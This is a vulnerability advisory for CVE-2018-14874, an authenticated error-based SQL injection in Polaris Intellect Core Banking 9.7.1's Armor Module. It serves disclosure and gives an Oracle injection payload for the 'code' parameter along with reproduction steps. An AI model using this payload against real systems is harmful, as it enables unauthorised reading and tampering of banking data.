Error Based SQL Injection Vulnerability in Polaris’ Intellect Core Banking Software Version 9.7.1 [CVE-2018-14874]
[+] Credits: Neeraj Kumar, Hai Dang Long
[+] Email: firstname.lastname@example.org
Polaris’ Intellect Core Banking, Armor Module
Affected Version: 9.7.1
Error Based SQL Injection vulnerability
SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. The Intellect Core is and Core Banking software used for manage the core banking functions. In Armor Module of the Intellect Core, input passed through the parameter 'code' in three pages as 'collaterals/colexe3t.jsp' and '/references/refsuppu.jsp' and '/references/refbranu.jsp' is not properly sanitising the input before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, destroy the data or make it otherwise unavailable and escalate his privileges to become administrator of the database server.
Note: This is vulnerable only with authenticated session.
SQL Exploit Code(s):
1) ' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Parameter Name: code
1. Login into the Application.
2. Access /refsuppu.jsp or /refbranu.jsp page.
3. Put below payloads in code parameter-
Payload-1:' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
4.It will give database name in error response.
' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)—
Figure (a): With Payload-1
Figure (b): With Payload-2
Vendor Notofication:17 June 2018
Mitre Notification: 3 August 2018
Public Disclosure: 31 March 2019
Impact Code execution:
Impact Information Disclosure:
Request Method(s): [+] GET
Vulnerable Product: [+] Intellect Core Banking Software (Polaris), Armor Module Version: 9.7.1
Vulnerable Parameter(s): [+] code
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).